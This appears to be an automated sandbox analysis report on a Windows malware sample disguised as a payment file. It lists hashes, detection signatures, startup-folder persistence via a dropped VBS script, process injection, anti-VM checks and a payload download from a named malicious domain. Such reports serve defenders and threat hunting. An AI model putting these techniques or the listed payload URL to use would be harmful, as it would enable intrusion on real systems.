Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDecPayment_Swi.exe

Overview

General Information

Sample name:rDecPayment_Swi.exe
Analysis ID:1572878
MD5:2091b5fb30deb2e988e44a7763ef6873
SHA1:6bb6a50e7f29ebb8fb8daea1136753a6b049a46c
SHA256:fbfd4f2eb410af82dc9bea05355fa616e4c60dafb81e86bd4447afdad0bfd6ce
Tags:exeuser-Porcupine
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample has a suspicious name (potential lure to open the executable)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
One or more processes crash
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • rDecPayment_Swi.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\rDecPayment_Swi.exe" MD5: 2091B5FB30DEB2E988E44A7763EF6873)
    • rDecPayment_Swi.exe (PID: 5280 cmdline: "C:\Users\user\Desktop\rDecPayment_Swi.exe" MD5: 2091B5FB30DEB2E988E44A7763EF6873)
      • WerFault.exe (PID: 6564 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1168 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.2335054364.0000000005E60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      Process Memory Space: rDecPayment_Swi.exe PID: 5064JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: rDecPayment_Swi.exe PID: 5064JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          Process Memory Space: rDecPayment_Swi.exe PID: 5280JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.rDecPayment_Swi.exe.5e60000.4.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Sigma Signatures

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\rDecPayment_Swi.exe, ProcessId: 5064, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CerberusInstall64.vbs

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\CerberusInstall64.exeReversingLabs: Detection: 21%
              Multi AV Scanner detection for submitted file
              Source: rDecPayment_Swi.exeReversingLabs: Detection: 21%
              Source: rDecPayment_Swi.exeVirustotal: Detection: 26%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\CerberusInstall64.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: rDecPayment_Swi.exeJoe Sandbox ML: detected
              Source: rDecPayment_Swi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rDecPayment_Swi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: %%.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266395059.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbQ! source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003E68000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335872800.0000000006170000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266395059.00000000009E8000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003E68000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335872800.0000000006170000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbWi source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbw8 source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3269937198.0000000005320000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000EA0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.pdbroU source: rDecPayment_Swi.exe, 00000003.00000002.3266608667.0000000000E89000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h0_2_01161908
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060D7E31h0_2_060D7C08
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060D7E31h0_2_060D7C18
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060D7876h0_2_060D7478
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060D7876h0_2_060D7488
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060DDC67h0_2_060DD9C7
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060FFD70h0_2_060FFCB8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 4x nop then jmp 060FFD70h0_2_060FFCB1
              Source: global trafficHTTP traffic detected: GET /book/Netnoyfq.mp3 HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /book/Netnoyfq.mp3 HTTP/1.1Host: xianggrhen.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: xianggrhen.com
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://ocsp.sectigo.com0
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xianggrhen.com
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://xianggrhen.com/book/Netnoyfq.mp30&eq
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: http://xianggrhen.com/book/Netnoyfq.mp3KAJ2BSIgoy4Kwyg0jeQ.K8BZdqVE7XAQiwtynX
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: https://sectigo.com/CPS0
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmp, rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
              Source: rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
              Source: rDecPayment_Swi.exe, CerberusInstall64.exe.0.drString found in binary or memory: https://www.cerberusftp.com/0

              System Summary

              barindex
              .NET source code contains very large array initializations
              Source: 0.2.rDecPayment_Swi.exe.42bfa08.2.raw.unpack, SingletonGenerator.csLarge array initialization: EnsureCustomSingleton: array initializer size 361280
              Initial sample is a PE file and has a suspicious name
              Source: initial sampleStatic PE information: Filename: rDecPayment_Swi.exe
              Sample has a suspicious name (potential lure to open the executable)
              Source: rDecPayment_Swi.exeStatic file information: Suspicious name
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_061514D8 NtProtectVirtualMemory,0_2_061514D8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_06153DD8 NtResumeThread,0_2_06153DD8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_061514D0 NtProtectVirtualMemory,0_2_061514D0
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_06153DD0 NtResumeThread,0_2_06153DD0
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C158310_2_05C15831
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_01161CC80_2_01161CC8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_011622480_2_01162248
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_01161CC60_2_01161CC6
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E374100_2_05E37410
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E33AA00_2_05E33AA0
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E306C80_2_05E306C8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E306D80_2_05E306D8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E350A80_2_05E350A8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E33DC70_2_05E33DC7
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E578800_2_05E57880
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E565E80_2_05E565E8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E565F80_2_05E565F8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E57DA00_2_05E57DA0
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E5A88A0_2_05E5A88A
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E578700_2_05E57870
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E500400_2_05E50040
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05E500060_2_05E50006
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D3E580_2_060D3E58
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D96E80_2_060D96E8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060DBB600_2_060DBB60
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D96D80_2_060D96D8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D6A800_2_060D6A80
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060D6A900_2_060D6A90
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060DBB500_2_060DBB50
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F76A80_2_060F76A8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F62000_2_060F6200
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060FDC880_2_060FDC88
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F59580_2_060F5958
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F76700_2_060F7670
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F61F20_2_060F61F2
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060FDC790_2_060FDC79
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_060F59480_2_060F5948
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_061512500_2_06151250
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_061512420_2_06151242
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_062100360_2_06210036
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_062100070_2_06210007
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_062100400_2_06210040
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 0_2_05C1584B0_2_05C1584B
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A1EE83_2_029A1EE8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A228A3_2_029A228A
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A22AE3_2_029A22AE
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A22D83_2_029A22D8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A22F03_2_029A22F0
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A361F3_2_029A361F
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A1EE83_2_029A1EE8
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A22623_2_029A2262
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A23193_2_029A2319
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A57303_2_029A5730
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A23313_2_029A2331
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A572C3_2_029A572C
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A1C503_2_029A1C50
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeCode function: 3_2_029A1C603_2_029A1C60
              Source: C:\Users\user\Desktop\rDecPayment_Swi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5280 -s 1168
              Source: rDecPayment_Swi.exeStatic PE information: invalid certificate
              Source: rDecPayment_Swi.exeBinary or memory string: OriginalFilename vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.000000000425F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSacuyw.exe" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2334027054.0000000005C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamePlliceaaz.dll" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000000.2004248104.00000000009B4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRoxfqhogqo.exeH vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2312621597.0000000000FDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRoxfqhogqo.exeH vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003EE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2332533960.0000000003E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2335404765.0000000006060000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.0000000002E8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2314204473.00000000031B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSacuyw.exe" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000000.00000002.2335872800.0000000006170000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000003.00000002.3266106838.000000000046A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSacuyw.exe" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000003.00000002.3267875188.0000000003C85000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSqpgffbndqp.dll" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000003.00000002.3267875188.0000000003DF5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSqpgffbndqp.dll" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000003.00000002.3269418694.0000000005050000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSqpgffbndqp.dll" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exe, 00000003.00000002.3267534589.0000000002C22000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSqpgffbndqp.dll" vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exeBinary or memory string: OriginalFilenameRoxfqhogqo.exeH vs rDecPayment_Swi.exe
              Source: rDecPayment_Swi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: rDecPayment_Swi.exe, Yzgfi.csCryptographic APIs: 'TransformFinalBlock'
              Source: CerberusInstall64.exe.0.dr, Yzgfi.csCryptographic APIs: 'TransformFinalBlock'
              Source: 0.2.rDecPayment_Swi.exe.42bfa08.2.raw.unpack, AdjustableCache.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.rDecPayment_Swi.exe.42bfa08.2.raw.unpack, AdjustableCache.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.rDecPayment_Swi.exe.42bfa08.2.raw.unpack, SingletonGenerator.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.rDecPayment_Swi.exe.3ee1590.0.raw.unpack, Yzgfi.csCryptographic APIs: 'TransformFinalBlock'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.rDecPayment_Swi.exe.3d55cc8.2.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.rDecPayment_Swi.exe.3df5ce8.3.raw.unpack, aMgBSjgwbM2HYxLf2nT.csCryptographic APIs: 'CreateDecryptor'
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 0.2.rDecPayment_Swi.exe.6170000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
              Source: 0.2.rDecPayment_Swi.exe.3f87490.1.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
